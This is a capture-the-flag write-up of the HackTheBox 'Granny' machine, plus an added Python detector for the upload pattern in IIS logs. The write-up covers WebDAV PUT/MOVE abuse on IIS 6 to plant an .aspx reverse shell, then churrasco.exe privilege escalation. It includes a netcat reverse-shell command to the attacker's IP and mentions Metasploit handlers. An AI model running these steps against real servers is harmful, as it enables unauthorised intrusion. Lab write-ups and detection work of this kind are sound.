HackTheBox Granny Writeup

Reconnaissance

Enumeration

Exploitation

Windows Privilege Escalation

Windows Privilege Escalation with Metasploit

________________________________________

Reconnaissance

Run the nmapAutomator.sh script to automate the recon/enumeration process.

Enumeration

We can see there is only one open port, port 80, running Microsoft IIS httpd 6.0. Let's browse it.

Nothing looks interesting in the browser, but the nmapAutomator scan shows that the HTTP PUT method is allowed, so let's check what type of file we are allowed to upload. .aspx files are not allowed but .txt files are. The scan also shows that the MOVE method is allowed; MOVE is used not only to change a file's location but also to rename it. Let's try to upload a text file via Cadaver. Our text file uploads perfectly. Now let's change the extension from .txt to .aspx. We have confirmed that the web server executes .aspx files. Let's generate .aspx shellcode and get a reverse shell.
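From the defender's side, the PUT-then-MOVE sequence above leaves a clear trace in the IIS access log. The following is an added example, not code from the original writeup: it parses constructed sample lines in the default IIS 6 W3C field layout and flags a successful PUT followed by a MOVE of the same path from the same client, then a request for an executable extension. It assumes the default field set, in which the MOVE Destination header is not logged, which is why the rule keys on the method sequence rather than on the new file name.

```python
# Added example, not part of the original writeup: flag the WebDAV upload pattern
# (PUT a harmless extension, then MOVE it to an executable one) in IIS W3C logs.
# SAMPLE_LOG is a constructed sample in the default IIS 6 field layout; the MOVE
# Destination header is not logged by default, so the rule keys on a successful
# PUT followed by a MOVE of the same path from the same client, plus any later
# request from that client for an executable extension.
from collections import defaultdict

SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2019-05-01 10:00:01 10.10.10.15 GET / - 80 - 10.10.14.58 Mozilla/5.0 200 0 0
2019-05-01 10:00:05 10.10.10.15 PUT /test.txt - 80 - 10.10.14.58 cadaver/0.23.3 201 0 0
2019-05-01 10:00:09 10.10.10.15 MOVE /test.txt - 80 - 10.10.14.58 cadaver/0.23.3 201 0 0
2019-05-01 10:00:20 10.10.10.15 GET /test.aspx - 80 - 10.10.14.58 Mozilla/5.0 200 0 0
2019-05-01 10:01:00 10.10.10.15 PUT /notes.txt - 80 - 10.10.14.58 cadaver/0.23.3 201 0 0
2019-05-01 10:02:00 10.10.10.15 OPTIONS / - 80 - 10.10.14.9 Mozilla/5.0 200 0 0
"""

EXEC_EXT = (".aspx", ".asp", ".ashx", ".asmx")   # server-side executable extensions

def parse_w3c(text):
    """Yield one dict per entry; the '#Fields:' directive defines the columns."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split(" ")
            if len(parts) == len(fields):
                yield dict(zip(fields, parts))

def find_rename_bypass(text):
    """Return (client_ip, put_path, executed_path) triples for the sequence
    PUT -> MOVE of the same path -> GET of an executable extension, all from
    the same client. executed_path is None if no execution request was seen."""
    uploaded = defaultdict(set)   # client -> paths successfully written via PUT
    hits = {}                     # (client, put_path) -> executed path or None
    for e in parse_w3c(text):
        ip, path, method = e["c-ip"], e["cs-uri-stem"], e["cs-method"]
        if not e["sc-status"].startswith("2"):
            continue              # only successful requests matter
        if method == "PUT":
            uploaded[ip].add(path)
        elif method == "MOVE" and path in uploaded[ip]:
            hits[(ip, path)] = None
        elif method == "GET" and path.lower().endswith(EXEC_EXT):
            for key in hits:      # attribute execution to this client's moved uploads
                if key[0] == ip and hits[key] is None:
                    hits[key] = path
    return [(ip, p, ex) for (ip, p), ex in hits.items()]

if __name__ == "__main__":
    print(find_rename_bypass(SAMPLE_LOG))   # [('10.10.14.58', '/test.txt', '/test.aspx')]
```

A PUT or MOVE that the server answers with a 2xx on a site that should be read-only is worth an alert on its own; the sequence match just raises the priority.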

Exploitation

Upload the file, change the file extension, start the netcat listener and execute the shellcode. Here we get a reverse shell. If we try to access the user directory we get access denied. Since we have low privileges, let's go for privilege escalation to get full access. To get system information run the "systeminfo" command. After googling and trying some exploits we found "Token Kidnapping Local Privilege Escalation"; we can find churrasco.exe on the Kali machine by using the command "locate churrasco".

Windows Privilege Escalation

Upload churrasco.exe and nc.exe the same way we uploaded our reverse shell, and change directory to "wwwroot" because that is the location of our uploaded files. To get a reverse shell with SYSTEM privileges we have to run the command "Churrasco.exe -d "C:\Inetpub\wwwroot\nc.exe 10.10.14.58 2345 -e cmd.exe"" on the victim machine and start a listener on the attacker machine. We got SYSTEM privileges. The user flag is in "C:\Documents and Settings\Lakis\Desktop" and the root flag is in "C:\Documents and Settings\Administrator\Desktop".

Windows Privilege Escalation with Metasploit

We can also get privilege escalation with Metasploit. First generate meterpreter shellcode and upload it the same way we uploaded our reverse shell. Now we can start our listener in Metasploit using "exploit/multi/handler"; after executing our exploit we get a meterpreter shell. Since we don't have full access we can use "post/multi/recon/local_exploit_suggester" for privilege escalation; it will suggest possible exploits that we can use to get full access, as shown in the image below.
